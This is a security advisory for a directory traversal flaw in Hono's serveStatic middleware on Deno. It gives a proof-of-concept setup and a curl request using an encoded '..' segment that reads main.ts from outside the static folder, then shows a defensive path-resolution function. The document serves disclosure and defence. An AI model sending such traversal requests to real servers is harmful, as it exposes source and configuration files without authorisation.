Security Headlines

GHSA-3mpf-rcc7-5347: Hono vulnerable to Restricted Directory Traversal in serveStatic with deno

Summary

When using serveStatic with Deno, it is possible to traverse directories up to the directory where main.ts is located.

My environment is configured as per this tutorial https://hono.dev/getting-started/deno

PoC

$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt

source

import { Hono } from 'https://deno.land/x/[email protected]/mod.ts'
import { serveStatic } from 'https://deno.land/x/[email protected]/middleware.ts'

const app = new Hono()
// root is the project directory; the mount is intended to expose only ./static
app.use('/static/*', serveStatic({ root: './' }))

Deno.serve(app.fetch)

request

curl localhost:8000/static/%2e%2e/main.ts

The response is the content of main.ts.

Impact

Unexpected files are retrieved.
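The request above works because the `%2e%2e` segment only becomes `..` after percent-decoding, so any containment check has to run on the decoded, normalised path. The following is an added example, not Hono's code or its fix: a resolver for a static route that assumes the mount point `/static/` and the directory `static` from the PoC layout, and refuses any path that would climb above that directory.

```javascript
// Added example (not Hono's own code): defensive path resolution for a
// static-file route. Assumptions: files under ROOT are served for URLs
// under PREFIX, mirroring app.use('/static/*', serveStatic(...)) above.
const ROOT = 'static';      // directory that may be served (assumption)
const PREFIX = '/static/';  // mount point (assumption)

// Returns the root-relative file path to read, or null when the request
// must be refused (traversal above ROOT, bad encoding, NUL, backslash).
function resolveStaticPath(urlPath) {
  if (!urlPath.startsWith(PREFIX)) return null;
  let rel;
  try {
    // Decode exactly once, before any check: %2e%2e is '..' only after
    // decoding, which is why matching '..' on the raw URL is not enough.
    rel = decodeURIComponent(urlPath.slice(PREFIX.length));
  } catch {
    return null; // malformed escape sequence such as %zz
  }
  // NUL bytes truncate paths in C APIs; backslash is a separator on Windows.
  if (rel.includes('\0') || rel.includes('\\')) return null;
  const out = [];
  for (const seg of rel.split('/')) {
    if (seg === '' || seg === '.') continue; // collapse '//' and '/./'
    if (seg === '..') {
      if (out.length === 0) return null;     // would escape ROOT
      out.pop();                             // stays inside ROOT, allow
      continue;
    }
    out.push(seg);
  }
  if (out.length === 0) return null;         // nothing to serve
  return ROOT + '/' + out.join('/');
}
```

A stricter policy that rejects every `..` segment outright is also reasonable; the version above shows the minimum that blocks the PoC while still serving normal nested files.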


References

  • GHSA-3mpf-rcc7-5347
  • honojs/hono@92e65fb
